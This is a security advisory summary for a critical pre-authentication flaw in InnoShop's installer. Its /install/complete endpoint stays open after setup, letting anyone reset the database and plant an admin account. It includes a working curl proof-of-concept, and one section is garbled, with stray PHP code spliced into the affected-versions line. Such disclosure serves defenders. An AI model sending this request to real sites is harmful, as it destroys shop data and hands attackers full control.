### Vulnerability Overview **Title**: [Security] Pre-auth Application Reinstall leads to full system takeover #314 **Type**: Critical pre-authentication vulnerability **Description**: The installation module (`inno packs/install`) of InnoShop contains a severe vulnerability. After the application is fully installed, the `/install/complete` endpoint remains accessible without any authentication or CSRF protection. An unauthenticated attacker can send a single POST request to overwrite the `.env` file, wipe the entire database via `migrate:fresh`, and create a new administrator account, thereby achieving complete system takeover. ### Impact Scope * **Affected Versions**: InnoShop loadRoutesFrom(__DIR__.'/routes/web.php'); $this->loadViewsFrom(__DIR__.'/resources/views', 'install'); $this->loadTranslationsFrom(__DIR__.'/lang', 'install'); } ``` ### POC Code / Exploit Code The advisory provides a complete `curl` command as a Proof of Concept (PoC), which is sufficient to exploit this vulnerability: ```bash curl -X POST "http:///install/complete" \ -H "Content-Type: application/x-www-form-urlencoded" \ -d "db_type=mysql&db_host_name=DB_HOST&db_port=3306&db_name=DB_NAME&db_username=DB_USER&db_password=DB_PASSWORD" ``` **Expected Result**: HTTP 200, returning `{"success": true, ...}`. The attacker can subsequently log in to `/panel` using the injected credentials.